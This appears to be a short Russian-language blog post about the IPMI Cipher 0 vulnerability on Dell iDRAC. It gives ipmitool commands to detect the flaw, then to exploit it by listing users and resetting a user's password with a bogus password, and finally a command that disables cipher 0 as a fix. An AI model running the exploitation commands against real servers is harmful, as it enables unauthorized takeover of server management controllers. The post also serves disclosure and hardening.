Dell iDrac IPMI Cipher 0 дыра

dell
Как выяснилось недавно, на Dell iDrac есть одна очень интересная уязвимость, называемая IPMI Cipher 0, как проверить что она есть у Вас


ipmitool -H xx.xx.xx.xx -U root -P password lan print| grep 'Cipher Suite Priv Max'

если в выхлопе будет нечто подобное:


Cipher Suite Priv Max   : aaaaaaaaaaaaaaa

поздравляю, Ваш драк можно сношать как душе угодно!
например, получим список пользователей


ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user list

а теперь изменим пас какому-либо пользователю


ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user set password 5 SuperPuper123

и пробуем авторизоваться через веб, удивлены?
Закрыть можно следующим образом


ipmitool -H xx.xx.xx.xx -U root -P password  lan set 1 cipher_privs XXXaXXXXXXXXXXX 

теперь снова пробуем


ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user list

и в итоге


Error in open session response message : no matching cipher suite
Error: Unable to establish IPMI v2 / RMCP+ session
Set User Password command failed (user 5)

Подробности…

Оцените статью
( Пока оценок нет )

Добавить комментарий